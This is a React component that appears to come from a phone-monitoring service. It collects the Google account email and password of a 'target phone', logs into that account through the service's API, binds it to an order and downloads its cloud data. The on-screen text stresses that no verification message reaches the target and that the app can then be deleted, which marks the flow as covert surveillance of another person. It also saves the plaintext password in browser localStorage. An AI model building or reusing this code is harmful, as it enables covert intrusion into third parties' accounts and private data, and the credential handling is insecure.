import Image from 'next/image'
import { useState } from 'react'
import { useTranslation } from 'src/utils/i18n'
import { messageInfo } from '../Message'
import { gcloudAuth, gcloudDownload, sendDownloadTime, userBindingDevice } from 'src/@api/login'
import resolveCurrentOrderId, { clearBindOrderContext } from 'src/utils/resolveCurrentOrderId'
import { resolveBindingDeviceResponse } from 'src/utils/bindingDeviceResult'
import { applyBoundDeviceByOrderId } from 'src/utils/appDeviceBridge'
import { fetchResetTime } from 'src/store/apps/Common'
import { useDispatch } from 'react-redux'
import SensitiveEmailInput from 'src/@core/components/SensitiveEmailInput/SensitiveEmailInput'

const App2 = ({ setCurrentItem }) => {
  const { t } = useTranslation('commonAndroid')

  const [username, setUsername] = useState('')
  const [password, setPassword] = useState('')

  // 限制时间
  const [isButtonDisabled, setIsButtonDisabled] = useState(false)

  const dispatch = useDispatch()

  const login = async () => {
    if (!handleClickLimit()) return
    if (username === '' || password === '') {
      messageInfo('Value cannot be empty')

      return
    }
    let re = /^([A-Za-z0-9_\-\.])+\@([A-Za-z0-9_\-\.])+\.([A-Za-z]{2,4})$/
    if (!re.test(username)) {
      messageInfo('Please enter a vaild email.')

      return
    }

    dataLayer.push({
      event: 'android-cloud-app-finish'
    })

    let obj = {
      username: username,
      password: password
    }

    let check = await gcloudAuth(obj)
    if (check.data.ec === 0 || check.data.status) {
      actionData(check)
      window.localStorage.setItem('Basic', 1)
      window.localStorage.setItem(
        'DeviceUser',
        JSON.stringify({
          username: username,
          password: password
        })
      )
    }
    messageInfo(check.data.em)
  }

  const actionData = async result => {
    if (result.data.ec === 0 || result.data.status) {
      // 成功
      messageInfo({
        content: result.data.em,
        duration: 4
      })

      // 绑定数据
      const orderId = await resolveCurrentOrderId()
      if (!orderId) {
        messageInfo({ content: 'Current order is missing' })

        return
      }

      const bindResult = await userBindingDevice({
        username: username,
        password: password,
        order_id: orderId,
        verify: 1,
        platformType: 'Android-Cloud'
      })
      const bindResolved = resolveBindingDeviceResponse(bindResult, {
        platformType: 'Android-Cloud',
        t,
        onMessage: opts => messageInfo(opts)
      })
      if (!bindResolved.shouldContinue) {
        return
      }

      // App 谷歌云绑定成功：同上，选中新设备 + 侧栏延迟刷新；失败则兜底写账号密码。
      const selected = await applyBoundDeviceByOrderId({
        orderId,
        platformType: 'Android-Cloud'
      })
      if (selected.ok) {
        clearBindOrderContext()
      } else {
        window.localStorage.setItem('Basic', 1)
        window.localStorage.setItem(
          'DeviceUser',
          JSON.stringify({
            username: username,
            password: password
          })
        )
      }

      // 下载数据
      let dow = await gcloudDownload({
        mode: 4,
        username: username,
        password: password
      })

      messageInfo({
        content: dow.data.ed,
        duration: 6
      })

      setTimeout(async () => {
        await sendDownloadTime({ username: username, type: 'basic_download' })
      }, 1500)
      setTimeout(() => {
        dispatch(fetchResetTime())
      }, 2000)

      setCurrentItem('Finish')
    }
  }

  const handleClickLimit = time => {
    let initTime = 3000
    if (time) {
      initTime = time
    }
    if (!isButtonDisabled) {
      setIsButtonDisabled(true)

      setTimeout(() => {
        setIsButtonDisabled(false)
      }, initTime) // x秒后重新启用按钮

      return true
    } else {
      return false
    }
  }

  return (
    <div className='w-full flex flex-col items-center'>
      <h2 className='text-[24px] text-[#282938] font-[600] mx-auto text-center'>
        {t('Connect the Google account in app')}
      </h2>
      <p className='mt-[20px] mb-[30px] w-[600px] Dsm:w-full text-[16px] Dsm:text-[14px] text-[#F11E34] text-center'>
        {t(
          'Please enter the Google account and password again and click Finish This time no verification message will be sent to the target phone Once the connection is complete you can delete the app'
        )}
      </p>
      <div className='w-[380px] Dsm:w-full h-[60px] Dsm:h-[48px] bg-[rgba(217,217,217,0.3)] rounded-[30px] flex'>
        <div className='w-[46px] h-full flex justify-center items-center'>
          <Image className='ml-[6px]' src='/images/android/setup/google.svg' width={16} height={16} alt='google' />
        </div>
        <SensitiveEmailInput
          className='text-[14px] flex-1 bg-transparent outline-none'
          placeholder={t('Google account email')}
          value={username}
          onChange={e => setUsername(e.target.value.trim())}
        />
        <div className='w-[16px] h-full flex justify-center items-center'></div>
      </div>
      <div className='mt-[24px] w-[380px] Dsm:w-full h-[60px] Dsm:h-[48px] bg-[rgba(217,217,217,0.3)] rounded-[30px] flex'>
        <div className='w-[46px] h-full flex justify-center items-center'>
          <Image className='ml-[6px]' src='/images/android/setup/password.svg' width={21} height={20} alt='google' />
        </div>
        <input
          type='password'
          className='text-[14px] flex-1 bg-transparent outline-none'
          placeholder={t('Password')}
          value={password}
          onChange={e => setPassword(e.target.value.trim())}
          onKeyDown={e => {
            if (e.key === 'Enter') {
              login()
            }
          }}
        ></input>
        <div className='w-[16px] h-full flex justify-center items-center'></div>
      </div>
      {/* 按钮 */}
      <button
        className={`${isButtonDisabled ? 'opacity-70' : ''
          } mt-[24px] w-[380px] Dsm:w-full h-[48px] Dsm:h-[40px] bg-[#FFCF55] rounded-[41px] text-[16px] text-[#1B1C2B] font-[600] flex items-center justify-center`}
        onClick={() => {
          login()
        }}
      >
        {t('Finish')}
        {isButtonDisabled && (
          <div className='w-[20px] h-[20px] border-[3px] border-[#FFF] border-b-[#FFCF55] rounded-[50%] inline-block box-border animate-spin ml-[16px]'></div>
        )}
      </button>
    </div>
  )
}

export default App2
